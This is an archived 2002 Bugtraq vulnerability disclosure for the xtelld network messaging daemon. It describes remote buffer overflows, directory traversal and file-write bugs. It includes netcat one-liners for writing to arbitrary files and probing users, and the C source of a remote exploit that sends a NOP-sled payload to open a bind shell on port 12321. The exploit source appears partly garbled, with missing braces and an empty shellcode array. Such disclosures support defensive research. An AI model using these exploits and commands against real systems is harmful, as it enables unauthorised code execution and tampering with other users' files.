8075113 2002-02-27 11:31 +0100  /299 rader/ Spybreak <spybreak@host.sk>
Sänt av: joel@lysator.liu.se
Importerad: 2002-03-01  06:44  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: submissions@packetstormsecurity.org
Mottagare: Bugtraq (import) <21188>
Ärende: Remote exploit against xtelld and other fun
From: "Spybreak" <spybreak@host.sk>
To: bugtraq@securityfocus.com
Cc: submissions@packetstormsecurity.org
Message-ID: <20020227113129.M49554@host.sk>

Release : 27/2/2002
Author  : Spybreak (spybreak@host.sk)
Software: xtell package
Versions: 2.6.1, most of the vulnerabilities are present in all
          previous versions
Problems: Remote execution of arbitrary code through several buffer overflows,
          information leakage, writing into arbitrary files with the rights
          of xtell.

Xtell from the Debian Linux distribution is a network messaging
client for sending messages to users on different computers.  Xtell
2.6.1 with at least 3 remote buffer overflows, symlink bug, ".."
directory traversal, file race condition (just mention some of them
...) and some "nice"   extra features can be a "funny" thing on ones

Debian Linux distributes versions 1.91 and 2.6.1 (the latest version)
but there do exist numerous versions between these two.

Xtell can be run as daemon or from inetd.  In the default
installation it runs as 'nobody' with GID tty and listens on the port
4224 (default Xtell port).  However even an ordinary user can run his
own Xtell server, with his/her UID/GID of course. As the portnumber
which the Xtelld listens on is fully    configurable, there can be
more than just one running Xtell server at the same time. Xtelld
servers run by ordinary users are not so rare to see, especially on
university computers without xtelld installed by admin.


Xtell 2.6.1 contains at least three remote buffer overflows.

Anyone with own DNS service can remotely execute arbitrary code
through a buffer overflow in the reverse resolving code in the xtelld
server, with the UID xtelld runs under.

Next, due to the absence of length check of the auth string obtained
from the auth service, an output buffer can be overflowed.  So anyone
with fakeident server is able to remotely execute arbitrary code on
the target system.

Finally the output buffer can be overflowed by the data itself sent
to the port 4224 (without playing with DNS or auth) depending on the
size of the strings returned by these services without any
manipulation.  But  playing with services gives instant results.

For more see the EXPLOIT part.


Of all of these possibilities I chose to send the exploit code
through the xtelld port while setting my ident string to length of
200 characters to make it closer to the end of the output buffer (our

The remote exploit (on the tail of this file) spawns a shell on the
port 12321 with the UID/GID of the xtelld server what is nobody/tty
by default.  Play a little with the offset and alignment. Should be
no problems to get it work. Do not forget to set your ident string.
The alignment is critical as the position of the exploit code in the
output buffer depends on the length of various strings in the output

But even without the exploit (patched kernel, etc ...) there can be
some fun with xtelld.

The server (xtelld) receives strings sent by the client (xtell) in the
following form:


FROM is the sender of the message, USER is the person we want to send
message,   TTY is the destination tty we want our message write to,
and finally MSG is our message. TTY can be max. 8 characters long.
After such message an xtelld server replies with some status message
to the    client.

Now how xtelld handles these different fields. Most interesting are
the USER and TTY fields. You should supply at least USER or TTY.  If
you supply only USER, xtelld will send your message to the USER's tty
provided he is logged in, and will search for .xtell-log file in the
USER's  home directory to log the message.

If you supply only TTY, xtelld will send your message to that tty if
it is writable by the xtelld server.

If you supply both USER and TTY, xtelld first tries to write to TTY
and then tries to find USER's .xtell-log file for logging. Doesn't
matter if USER is a valid username on the target system.

Now a funny secret. Xtelld believes that TTY is a valid tty, it
simply places it under "/dev/" and tries to blindly write into it. No
checks for valid tty   belonging to logged in user USER.  Therefore
we can directly write some junk into any device under /dev, writable
by xtelld (default nobody/tty).

And due to a directory traversal possibility, with local access we
can do:   (especially interesting when xtelld run by some user)

        ln -s some-users-file /tmp/x
        echo ::../tmp/x:junk | nc localhost 4224
        or with the client:

        xtell :../tmp/x@localhost junk

Recall that TTY can be max. 8 chars long.
With netcat variant we can easily control the FROM field.

Why use that old-fashioned finger?
Try to send a "little" longer message.
When the user is logged in you'll get:

        $ echo :USER::`perl -e 'print "A" x 2000'`| nc victimhost 4224
        200 OK, sent.
        406 Ehhh, what?


        405 Cannot write to that user's tty.
        406 Ehhh, what?


        404 User does not want you.
        406 Ehhh, what?

if he's not:

        403 User is not here.
        406 Ehhh, what?

Provided that USER is a valid login name.
Stealthy, without any logs.
On the target "TTY" xtelld tries to show (besides the MSG) some info
on the sender of the message - the USER field, user resolved by
identd, IP or resolved FQDN.  With crazy combinations of different
field lengths (differ between versions) it is posible to make xtelld
fail to output the senders address.  In such cases xtelld outputs
only the FROM : MSG fields, which can be easily manipulated.This way
it is possible to quietly remotely fill with trash someones
.xtell-log file, providing "null" as the TTY, to avoid output to that
USER's tty, or fill the /tmp directory.

There is also a race condition in checking for the regularity of the
file ...
------------------------- snip --------------------------------
cat >xtelld261.c <<EOF
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <netinet/in.h>

 *      Remote exploit for Xtelld 2.6.1 and older
 *      Spawns shell on port 12321
 *      Don't forget to set your identd string to 200 characters
 *      Tested against Red Hat 7.2, 7.1; Debian Potato
 *      (c) 2002 Spybreak (spybreak@host.sk)

#define RET     0xbffff5a0

char sc[] =

usage (char *exp)
  fprintf (stderr, "Remote exploit for xtelld 2.6.1 and older.\n"
           "Spawns shell on port 12321.\n"  
           "-- (c) 2002/2 Spybreak --\n"
           "Usage: %s [options] target\n", exp);
  fprintf (stderr, "Options: -a alignment (default 0)\n"
           "         -o offset (default 0)\n"
           "         -p port (default 4224)\n");
  exit (-1);
main (int argc, char **argv)
  int c, s, i, size, port = 4224;
  int ret = RET, alignment = 0;
  struct sockaddr_in target;
  struct hostent *host;
  char payload[1078];
  opterr = 0;
  while ((c = getopt (argc, argv, "a:o:p:")) != -1)
    switch (c)
      case 'a':
        alignment = atoi (optarg);
      case 'o':
        ret += atoi (optarg);
      case 'p':
        port = atoi (optarg);
        usage (argv[0]);
        exit (1);
  if (!argv[optind])
      puts ("no target!");
      usage (argv[0]);
  printf ("Using: TARGET: %s\tPORT: %d\tADDR: %x\t ALIGN: %d\n",
          argv[optind], port, ret, alignment);
  for (i = 0; i < 540; i++)  
    payload[i] = 0x90;
  for (i = 540; i <= 1072; i += 4)
    *((int *) (payload + i)) = ret;

  memcpy (payload + 540, sc, sizeof (sc) - 1);
  memcpy (payload, "01234567890123456789::null:;-)", 30);
  payload[1077 + alignment] = '\n';
  host = gethostbyname (argv[1]);
  if (host == NULL)
      perror ("gethostbyname");
      return (-1);
  s = socket (AF_INET, SOCK_STREAM, 0);
  if (s < 0)
      perror ("socket");     
      return (-1);
  target.sin_family = AF_INET;
  target.sin_addr = *((struct in_addr *) host->h_addr);
  target.sin_port = htons (port);

  if (connect (s, (struct sockaddr *) &target, sizeof (target)) == -1)
      perror ("connect");
      close (s);   
      return (-1);
  size = send (s, payload + alignment, 1078, 0);
  if (size == -1)
      perror ("send");
      close (s);
      return (-1);
  close (s);
  return (0);

(8075113) /Spybreak <spybreak@host.sk>/---(Ombruten)